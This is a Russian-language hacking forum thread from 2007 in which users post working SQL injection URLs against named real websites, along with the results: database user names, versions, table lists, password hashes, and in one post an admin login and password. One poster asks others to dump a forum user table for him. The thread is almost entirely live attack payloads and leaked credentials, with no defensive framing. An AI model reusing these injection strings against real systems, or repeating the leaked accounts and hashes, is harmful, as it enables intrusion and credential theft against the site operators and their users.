SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    391
    Likes Received:
    247
    Reputations:
    88
    http://novochgrad.ru
    db novochgr_novochgrad
    user novochgr_novochg@localhost
    ver 4.1.21-standard-log
    Code:
    http://novochgrad.ru/now.php?id=-1+union+select+null,version(),null/*
    Больше ничего выдернуть не получается((
     
    1 person likes this.
  2. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://[COLOR=Yellow]www.afgrond.org[/COLOR]/Forum/CommMain.php?O_ID=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2,3/*  
    roger@localhost:4.0.15:Afgrond
    Code:
    http://[COLOR=Yellow]www.109-7-109.ru[/COLOR]/index.php?o_id=-1+union+select+1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database()),8,9,10,11,12,13,14,15,16,17,18,19,20/*  
    [email protected]:4.0.27-log:fmmarta
    Code:
    http://[COLOR=Yellow]www.prezzibenzina.it[/COLOR]/distributore.php?di_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52/*
    prezzibenzina@localhost:4.1.20-log:pb_main
    paty:06d2625cbe132813d18f9e13245d1d43:[email protected]
    Code:
    http://[COLOR=Yellow]www.glidecam.com[/COLOR]/operator_gallery.php?o_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7/*  
    gcdbuser@localhost:4.1.20:glidecamcom
    candy_ccandy@localhost:4.1.22-standard:candy_consumercandy
    [email protected]:ªOÔÌy^K
    Noy:0364d49f7ea43aaaed7564795de9c56c7ef3ea8e
    dan:59da512108d33d1266ab3a0b9a13b077bbd8c274
    test:a94a8fe5ccb19ba61c4c0873d391e987982fbbd3
    Rebecca:f8256df07b6c299348bf7ad3cd014949a5caef38
    manager:7b21848ac9af35be0ddb2d6b9fc3851934db8420
    партнерка =) Total Cash paid out to our members $5,645,851.39
     
    2 people like this.
  3. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    http://[COLOR=Orange]www.charitygreetings.com[/COLOR]/newsend_1.php?o_id=-1+union+select+concat(user(),0x3a,version(),0x3a,database()),2/*
    charitygreetings@localhost:4.1.20:charitygreetings
    Code:
    http://[COLOR=Orange]www.wexmedia.at[/COLOR]/details.php?o_id=99999+union+select+1,2,3,4,5,6,7,8,9,10,aes_decrypt(aes_encrypt(version(),0x71),0x71),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45/*'
    4.1.18-standard-log
    Code:
    http://[COLOR=Orange]www.pysanka.ua[/COLOR]/index.php?navl=otkrutki&o_id=-1+union+select+1,version(),user()/*  
    pisanka@localhost 5.0.27
    Code:
    http://[COLOR=Orange]www.pysanka.ua[/COLOR]/index.php?navl=otkrutki&o_id=-1+union+select+1,2,concat(user,char(64),password)+from+mysql.user+limit+0,1/*  
    root@22b60809101adcf3
    olusm@707b5362398716cc
    chipua_user@74e54a4f70159a50
    kazanova_user@3b251a676d8ee804
    kviten@400dd0984950a0f5
    obolon@6259a20519584237
    pisanka@5376110c3fa1e846
    scandic@0a40aadb79278a38
    tenders@6872dce4027e979b
    ukrbizner@084aff4320ccc88d
    vgorah_user@7d21440837c74ae7
    weather@5539e1093c971082
    razvlekalov@0e42b63135601dbc
    solodko@2ac85b22774a0f53
    Code:
    http://[COLOR=Orange]www.pysanka.ua[/COLOR]/index.php?navl=otkrutki&o_id=-1+union+select+1,2,concat(table_schema,char(64))+from+information_schema.tables+where+table_name=char(117,115,101,114,115)+limit+2,1/*  
    интересные таблицы:
    forumobolon.users
    kazanova.users
    olus.users
    pisanka.users
    razvlekalov.users
    ukrbiznes_expo.users
    kviten.clients
    ukrbiznes_catalog.clients
    kviten.gamers
    news2.subscribe
    razvlekalov.subscribe
    ukrbiznes_catalog.subscribe
    ukrbiznes_news.subscribe
    ...домейнсдб =)
    Code:
    http://[COLOR=Orange]www.cultspace.org[/COLOR]/viewHolyTextComments.php?text_id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())/*  
    cultspac_root@localhost:4.1.22-standard-log:cultspac_production
    Code:
    http://[COLOR=Orange]www.filmaffinity.com[/COLOR]/es/listtopmovies.php?list_id=-1/**/union/**/select/**/concat(user(),0x3a,version(),0x3a,database())/*  
    filmaf2_webuser@localhost:5.0.27:filmaf2_data
    Code:
    http://[COLOR=Orange]www.timothysyndrome.org[/COLOR]/index.php?p=list_links&l_id=-1+union+select+1,2,3,4,5,concat(user(),0x3a,version(),0x3a,database())/*
    timmi@localhost:4.1.20:timothysyndromeorg
    Code:
    http://[COLOR=Orange]ru.ecomstation.ru[/COLOR]/ecsfaq/faq.php?idc=99999/**/union/**/select/**/1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9/*
    eco@localhost:4.1.22:eco
    Code:
    http://[COLOR=Orange]www.igrandiviaggi.it[/COLOR]/scheda.php?id=-1'+union+select+1,2,3,4,5,6,concat(user(),0x3a,version(),0x3a,database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80/*
    igrandiviaggi@piaccapi:5.0.45-community-nt:igrandiviaggi
     
    4 people like this.
  4. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Код:

    http://russianwomenabroad.com/links/report.php?id=-329+union+select+1,concat_ws(0x3a,username,user_email,user_icq,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+phpbb_users+limit+0,1/*

    админ на русскоязычном форуме: admin/mamalena

    код:

    http://russianwomenabroad.com/links/report.php?id=-329+union+select+1,concat_ws(0x3a,username,user_email,user_icq,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+phpbbe_users+limit+0,1/*
     
    2 people like this.
  5. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.gavgav.info/index.php?tree=4&mode=view&id=-1+union+select+concat_ws(0x2F,version(),database(),user()),2,3,4,5,6/*

    4.1.22-lk-log/ikarhomcen_gav/ikarhomcen_gav@localhost

    -------------------------------------------------------------------

    http://www.zyll.net/news.php?id=-1+union+select+1,2,3,concat_ws(0x2F,version(),database(),user()),5,6,7/*

    4.1.22-log/freemp3_slovo/freemp3_slovo@goliaph

    ------------------------------------------------------------------

    http://wow.crpg.ru/article.php?sid=-1+union+select+1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),8,9,10,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),12/*

    4.1.7/WOW/wow@localhost

    ------------------------------------------------------------------

    http://www.crpg.ru/sections.php?op=viewarticle&artid=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),5,6,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),8,9,10,11,12,13,14,15,16,17,18,19,20,21/*

    4.1.7/ crpg/ crpg@localhost
     
    4 people like this.
  6. min7

    min7 Elder - Старейшина

    Joined:
    3 Sep 2005
    Messages:
    117
    Likes Received:
    85
    Reputations:
    11
    Так сказать мои первые шаги в освоении SQL инъекций)
    Code:
    http://[COLOR=Green]www.phpbuddy.com[/COLOR]/article.php?id=-4+union+select+concat_ws(0x3a,user(),version(),database()),2,3,4,5,6/*
    phpbud22_phpbudd@localhost/4.1.21-standard-log/phpbud22_phpbuddy
     
    3 people like this.
  7. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    http://www.toulouseweb-aero.com/news_affic.php?id=8711+order+by+37/*

    HTML:
    http://www.aerokubinka.ru/index.php3?id=199+union+select+1,2,3,4,5,concat(nick,char(58),email,char(58),passwd,char(58),icq),7,8,9+from+_user/*  
    Версия: 5


    HTML:
    http://www.ff-aero.fr/affichage_textes.php?id=-61+union+select+1,2,3,4,version(),6,7,8,9,10,login,password,13,14,15,16+from+user/*
    Версия: 4.1.20-max-log




    PHP:
    http://matkarajad.maaturism.ee/index.php?id=85+union+select+1,version(),3,4,5,6--&pg=object
    Виерсия: 4.1.22-log (внизу)


    HTML:
    http://www.capsi.ca/council.php?mem_id=3+union+select+1,2,3,4,5,6,conc  at_ws(char(58),name,email,password),8,9,10,11,12,1  3+from+members/* 
    
     
    2 people like this.
  8. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    Демократия

    HTML:
    http://www.democracy.ru/article.php?id=1837+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
    3 таблицы
    news
    phpb_users
    clients
     
    2 people like this.
  9. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    Клуб Бухгалтеров

    HTML:
    http://www.provodka.ru/publication.php?id=1096&part=-17%20UNION%20SELECT%201/*
    версия БД >5 таблиц 147

    офигеть нашёл нормальную таблицу phpbb_users, если кто сможет её залить скиньте в личку плиз
     
    1 person likes this.
  10. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    http://www.merrimack.tv/news/index.php?id=-1+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables/*
     
    2 people like this.
  11. min7

    min7 Elder - Старейшина

    Joined:
    3 Sep 2005
    Messages:
    117
    Likes Received:
    85
    Reputations:
    11
    Code:
    http://[COLOR=Olive]www.ecodefense.ru[/COLOR]/view.php?id=-483+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),database(),version()),11/*
    ecodefensedb@localhost/ecodefense/4.1.22-log
     
    #3531 min7, 3 Nov 2007
    Last edited: 3 Nov 2007
    3 people like this.
  12. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://www.vaal.ru/show.php?id=-170+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11/*
    4.0.27-max-log

    Баз нарыть не смог
     
    1 person likes this.
  13. Dimi4

    Dimi4 Чайный пакетик

    Joined:
    19 Mar 2007
    Messages:
    750
    Likes Received:
    1,046
    Reputations:
    291
    Сорри за офф, там ищо хсс в поиске
     
    3 people like this.
  14. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://www.korova.ru/humor/viewer.php?id=4434+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+LIMIT+1,1/*
    БД 4.0.27-max-log
    таблиза sites
     
  15. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://fromatoz.com.ua/book.php?sprav=santeh2006&rubr=4+UNION+SELECT+1,concat(user,0x3a,pass),3+From+users/*
    HTML:
    http://fromatoz.com.ua/book.php?sprav=santeh2006&rubr=4+UNION+SELECT+1,concat(user,0x3a,password),3+From+mysql.user/
    Админка
    HTML:
    http://fromatoz.com.ua/admin/login.php
     
  16. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://www.ftrain.h1.ru/article.php?sid=-24+UNION+SELECT+1,2,3,4,5,6,7/*
    таблицу не нашёл
    БД 4.0.18
     
  17. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Мобильные блоги

    Код:

    http://moblog.co.uk/view.php?id=-77571+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,userid,username,displayname,email,realmail,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49+from+mob_users+limit+15741,1/*

    первый юзер в списке-админ на форуме ;)
    ________________________________________

    Магазин рефератов,курсовых...

    код:

    http://www.sessia.ru/index.php?mode=links_catalog&cid=-24+union+select+1,2,3,4,5,6,concat(email,0x3a,name,0x3a,password),8,9,10,11,12,13,14,15,16,17+from+user/*
     
    #3537 sasTO, 4 Nov 2007
    Last edited: 4 Nov 2007
    2 people like this.
  18. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Типа Хостинга Украинского

    Code:
    http://www.ukrnic.com/hosting_info.php?id=2+union+select+1,version(),user()/*
    данные ukrnic_dima@localhost
     
  19. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.4oem.ru/stat/index.php?id=-10+union+select+1,2,3,4,5,6,concat(version(),0x3e,user(),0x3e),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*

    5.0.27-log|| [email protected]
     
  20. K1nD[e]R

    K1nD[e]R Banned

    Joined:
    16 Jun 2007
    Messages:
    159
    Likes Received:
    127
    Reputations:
    0
    Code:
    http://www.mediumsearch.com/catalog/category.php?id=-27+union+select+1,concat(user(),0x3a,version()),3/*
    a270_1@localhost 4.1.20-log
     
    3 people like this.
Thread Status:
Not open for further replies.